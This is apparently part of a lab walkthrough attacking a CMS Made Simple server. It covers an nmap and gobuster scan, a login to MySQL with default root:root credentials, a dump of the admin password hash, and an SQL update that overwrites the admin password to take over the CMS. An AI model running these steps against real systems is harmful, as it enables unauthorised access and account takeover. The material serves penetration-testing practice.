PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
| 256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_ 256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home - My CMS
3306/tcp open mysql MySQL 8.0.19
| ssl-cert: Subject: commonName=MySQL_Server_8.0.19_Auto_Generated_Server_Certificate
| Not valid before: 2020-03-25T09:30:14
|_Not valid after: 2030-03-23T09:30:14
| mysql-info:
| Protocol: 10
| Version: 8.0.19
| Thread ID: 56
| Capabilities flags: 65535
| Some Capabilities: SupportsTransactions, ODBCClient, Support41Auth, IgnoreSigpipes, SupportsCompression, Speaks41ProtocolOld, InteractiveClient, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, LongColumnFlag, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: .\\x06?2rSLn|n_NIH'\\x0E%n(\\x05
|_ Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data.
When we browse there it is a CMS Make Simple on version 2.2.13
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.158.74 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/admin (Status: 301) [Size: 316] [--> <http://192.168.158.74/admin/>]
/assets (Status: 301) [Size: 317] [--> <http://192.168.158.74/assets/>]
/.htpasswd (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/cgi-bin/ (Status: 403) [Size: 279]
/doc (Status: 301) [Size: 314] [--> <http://192.168.158.74/doc/>]
/index.php (Status: 200) [Size: 19502]
/lib (Status: 301) [Size: 314] [--> <http://192.168.158.74/lib/>]
/modules (Status: 301) [Size: 318] [--> <http://192.168.158.74/modules/>]
/phpmyadmin (Status: 401) [Size: 461]
/phpinfo.php (Status: 200) [Size: 90131]
/server-status (Status: 403) [Size: 279]
/tmp (Status: 301) [Size: 314] [--> <http://192.168.158.74/tmp/>]
/uploads (Status: 301) [Size: 318] [--> <http://192.168.158.74/uploads/>]
Viewing /phpmyadmin
After viewing a lot of pages and browsing around the login form, still no luck. So I move to check out the nmap default MySQL since its made public
┌──(kali㉿VirtualBox)-[~]
└─$ mysql -h 192.168.158.74 -u root -p
Enter password: root
Welcome to the MariaDB monitor. Commands end with ; or \\g.
Your MySQL connection id is 329
Server version: 8.0.19 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.
MySQL [(none)]>
Surprising it works with the default credential root:root
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| cmsms_db |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.356 sec)
MySQL [(none)]> use cmsms_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [cmsms_db]> show tables;
+--------------------------------+
| Tables_in_cmsms_db |
+--------------------------------+
| cms_additional_users |
| cms_additional_users_seq |
| cms_admin_bookmarks |
| cms_admin_bookmarks_seq |
| cms_adminlog |
| cms_content |
| cms_content_props |
| cms_content_props_seq |
| cms_content_seq |
| cms_event_handler_seq |
| cms_event_handlers |
| cms_events |
| cms_events_seq |
| cms_group_perms |
| cms_group_perms_seq |
| cms_groups |
| cms_groups_seq |
| cms_layout_design_cssassoc |
| cms_layout_design_tplassoc |
| cms_layout_designs |
| cms_layout_stylesheets |
| cms_layout_templates |
| cms_layout_tpl_addusers |
| cms_layout_tpl_categories |
| cms_layout_tpl_type |
| cms_locks |
| cms_mod_cmsjobmgr |
| cms_mod_filepicker_profiles |
| cms_module_deps |
| cms_module_news |
| cms_module_news_categories |
| cms_module_news_categories_seq |
| cms_module_news_fielddefs |
| cms_module_news_fieldvals |
| cms_module_news_seq |
| cms_module_search_index |
| cms_module_search_items |
| cms_module_search_items_seq |
| cms_module_search_words |
| cms_module_smarty_plugins |
| cms_module_templates |
| cms_modules |
| cms_permissions |
| cms_permissions_seq |
| cms_routes |
| cms_siteprefs |
| cms_user_groups |
| cms_userplugins |
| cms_userplugins_seq |
| cms_userprefs |
| cms_users |
| cms_users_seq |
| cms_version |
+--------------------------------+
53 rows in set (0.305 sec)
MySQL [cmsms_db]> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| 1 | admin | 59f9ba27528694d9b3493dfde7709e70 | 1 | | | [email protected] | 1 | 2020-03-25 09:38:46 | 2020-03-26 10:49:17 |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
1 row in set (0.296 sec)
Here we found a credential, but mostly its encoded so we will go to https://crackstation.net/
However knowing that it is a MD5 hash, and we have root access to the MySQL database, maybe we can INSERT new query to update the database
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name ='sitemask'),''),'password'))) where username = 'admin';
The result be like
MySQL [cmsms_db]> update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name ='sitemask'),''),'password'))) where username = 'admin';
Query OK, 1 row affected (0.976 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Now we can back to the admin login page and login with admin:password